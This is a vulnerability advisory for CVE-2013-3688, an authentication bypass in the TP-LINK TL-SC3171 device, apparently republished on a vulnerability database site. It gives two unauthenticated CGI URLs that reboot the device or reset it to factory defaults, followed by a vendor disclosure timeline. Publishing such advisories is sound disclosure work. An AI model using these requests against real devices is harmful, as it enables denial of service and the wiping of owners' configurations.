Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

TP-LINK TL-SC3171 Authentication Bypass

Related Vulnerabilities: CVE-2013-3688  
Publish Date: 13 Jun 2013
Author: Javier Repiso Sanchez, Eliezer Varad Lopez, Jonas Rapero Castillo
Source 
                							

                ===========================================================================
TP-LINK
====================================================================
===========================================================================

1.Advisory Information
Title: TP-LINK TL-SC3171 Vulnerability
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The next vulnerability has been found in this device:
-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250).

3.Affected Products
-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Execute Remote Command bypassing authentication
CVE-2013-3688, Execute Remote Command bypassing authentication.
We have found that is possible to reboot this kind of devices remotely. The attack vector is the following one:
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/reboot
http://xx.xx.xx.xx/cgi-bin/hardfactorydefault
_____________________________________________________________________________

In the first one you will get blank page and you can’t re-login until the device is reboot.
In the second one, you will get a victory message and of course, in the next login you should introduce factory settings.

5.Credits
-CVE-2013-3688, was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo. 

6.Report Timeline
-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.
-2013-06-03: Students asks for a reply. 
-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version.
-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities.
-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.
-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.
-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link  
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started